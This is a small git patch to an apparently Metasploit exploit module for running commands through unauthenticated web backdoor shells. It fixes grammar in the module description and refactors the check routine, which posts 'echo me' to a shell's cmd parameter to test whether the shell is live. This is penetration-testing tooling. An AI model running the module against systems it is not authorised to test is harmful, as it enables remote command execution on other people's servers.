From 467f9a8353ec4b7ce638d6bf8b10a90521ef45fc Mon Sep 17 00:00:00 2001 From: JT Date: Tue, 8 Sep 2015 14:45:54 +0800 Subject: [PATCH] Update simple_backdoors_exec.rb --- .../multi/http/simple_backdoors_exec.rb | 17 ++++++++--------- 1 file changed, 8 insertions(+), 9 deletions(-) diff --git a/modules/exploits/multi/http/simple_backdoors_exec.rb b/modules/exploits/multi/http/simple_backdoors_exec.rb index afdf904043dc..f18ccb4584d3 100644 --- a/modules/exploits/multi/http/simple_backdoors_exec.rb +++ b/modules/exploits/multi/http/simple_backdoors_exec.rb @@ -15,9 +15,9 @@ def initialize(info={}) 'Name' => 'Simple Backdoor Shell Remote Code Execution', 'Description' => %q{ This module exploits unauthenticated simple web backdoor shells by leveraging the - common backdoor shells' CMD parameter to execute commands. The SecLists project of - Daniel Miessler and Jason Haddix has a lot of samples for these kind of backdoor shells - which are categorized under Payloads. + common backdoor shell's CMD parameter to execute commands. The SecLists project of + Daniel Miessler and Jason Haddix has a lot of samples for this kind of backdoor shells + which is categorized under Payloads. }, 'License' => MSF_LICENSE, 'Author' => @@ -58,15 +58,14 @@ def initialize(info={}) def check test = "echo me" - request_parameters = { - 'method' => 'POST', - 'uri' => normalize_uri(target_uri.path.to_s), - 'vars_post' => + shell = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path.to_s), + 'vars_post' => { 'cmd' => test } - } - shell = send_request_cgi(request_parameters) + }) if (shell and shell.body =~ /echo me/) return Exploit::CheckCode::Vulnerable end